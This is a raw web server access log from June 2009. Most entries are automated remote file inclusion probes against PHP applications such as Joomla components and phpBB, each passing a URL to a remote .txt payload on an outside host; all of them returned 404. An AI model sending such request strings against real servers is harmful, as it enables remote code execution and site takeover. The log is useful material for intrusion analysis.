125.131.116.12 - - [06/Jun/2009:04:16:04 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:16:04 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:16:04 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:16:13 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:16:27 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:16:47 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:16:47 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:16:47 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:16:49 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:16:49 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:16:49 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:16:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.182.18 - - [06/Jun/2009:04:17:33 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:04:17:40 -0400] "GET /logs/access_log.Q109052400/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:04:17:40 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:04:17:41 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
67.15.182.18 - - [06/Jun/2009:04:18:34 -0400] "GET /logs/access_log.Q109050300//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:18:42 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:18:42 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:18:42 -0400] "GET /logs/access_log.Q109050300%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:18:42 -0400] "GET /logs/access_log.Q108121900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:18:43 -0400] "GET /logs/access_log.Q109052300//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:18:45 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:18:46 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:01 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:01 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:03 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:03 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:04 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:19:17 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:19:17 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:19:17 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:24 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:04:19:45 -0400] "GET /modules/My_eGallery/index.php?basepath=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:04:19:45 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:04:19:46 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:19:47 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:47 -0400] "GET ///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:47 -0400] "GET /logs///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:19:47 -0400] "GET /logs/access_log.Q109052100%20%20///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:19:53 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:20:16 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:20:17 -0400] "GET /logs/access_log.Q109052100///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:20:18 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:04:20:29 -0400] "GET /logs/access_log.Q109051100%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:20:39 -0400] "GET //components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:20:39 -0400] "GET /logs//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:20:39 -0400] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:20:50 -0400] "GET //components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:20:50 -0400] "GET /logs//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:20:50 -0400] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:21:16 -0400] "GET /logs//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:21:16 -0400] "GET //components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:21:16 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:21:21 -0400] "GET /logs/access_log.Q109052900%20%20/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:04:21:27 -0400] "GET /logs/access_log.Q109052900%20%20/modules/My_eGallery/index.php?basepath=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:21:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.131.116.12 - - [06/Jun/2009:04:22:10 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:22:39 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:22:39 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:22:39 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:04:23:08 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:04:24:16 -0400] "GET /logs/access_log.Q109052300/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
195.34.78.110 - - [06/Jun/2009:04:24:16 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:24:16 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:24:16 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:04:24:16 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:04:24:16 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
195.34.78.110 - - [06/Jun/2009:04:24:17 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.55.227.145 - - [06/Jun/2009:04:24:34 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://amboy-x.ucoz.ae/delta/test.txt? HTTP/1.1" 404 261 "-" "Mozilla/4.61 [en] (OS/2; U)"
218.55.227.145 - - [06/Jun/2009:04:24:39 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://amboy-x.ucoz.ae/delta/test.txt? HTTP/1.1" 404 266 "-" "Mozilla/4.61 [en] (OS/2; U)"
217.169.210.130 - - [06/Jun/2009:04:25:14 -0400] "GET /logs/error_log.Q109042900/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
67.15.182.18 - - [06/Jun/2009:04:25:48 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.198.73.59 - - [06/Jun/2009:04:26:39 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
213.198.73.59 - - [06/Jun/2009:04:26:39 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
213.198.73.59 - - [06/Jun/2009:04:26:39 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:26:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.145.31.131 - - [06/Jun/2009:04:27:35 -0400] "GET //components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:27:35 -0400] "GET /logs//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:27:35 -0400] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.xml.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:27:50 -0400] "GET //main.php?sayfa=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:27:50 -0400] "GET /logs//main.php?sayfa=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:27:50 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:27:50 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:28:25 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:28:25 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:28:25 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:28:33 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:29:43 -0400] "GET /logs/access_log.Q109052400/public_includes%20/%20pub_blocks%20/%20activecontent.php?%20vsDragonRootPath%20=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:29:43 -0400] "GET /public_includes%20/%20pub_blocks%20/%20activecontent.php?%20vsDragonRootPath%20=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:04:29:43 -0400] "GET /logs/public_includes%20/%20pub_blocks%20/%20activecontent.php?%20vsDragonRootPath%20=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:29:47 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:30:03 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:30:08 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:30:28 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:30:28 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:30:28 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:30:34 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:30:49 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:30:50 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:31:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [06/Jun/2009:04:32:23 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes%20/%20pub_blocks%20/%20activecontent.php?%20vsDragonRootPath%20=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:04:32:31 -0400] "GET /logs/error_log.Q108052600/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:04:32:31 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:04:32:31 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
66.249.71.14 - - [06/Jun/2009:04:32:32 -0400] "GET /logs/access_log.Q109011400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.254.243.197 - - [06/Jun/2009:04:32:44 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:33:08 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.15.48.60 - - [06/Jun/2009:04:33:24 -0400] "GET /logs/access_log.Q109051700//index.php?sayfa=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:04:33:24 -0400] "GET //index.php?sayfa=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:04:33:24 -0400] "GET /logs//index.php?sayfa=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:04:34:01 -0400] "GET /logs/error_log.Q109051700//index.php?sayfa=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
121.254.243.197 - - [06/Jun/2009:04:34:04 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:04:34:42 -0400] "GET /logs/access_log.Q107082500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.48.60 - - [06/Jun/2009:04:35:31 -0400] "GET /logs/access_log.Q108112300//index.php?pag=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:04:35:31 -0400] "GET //index.php?pag=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:04:35:31 -0400] "GET /logs//index.php?pag=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
218.145.31.131 - - [06/Jun/2009:04:35:56 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:35:56 -0400] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:35:56 -0400] "GET /logs/access_log.Q109051100//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:36:06 -0400] "GET /logs/access_log.Q109052900//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:36:33 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:36:33 -0400] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:36:33 -0400] "GET /logs/access_log.Q109051100//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:36:40 -0400] "GET /logs/access_log.Q109052900//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
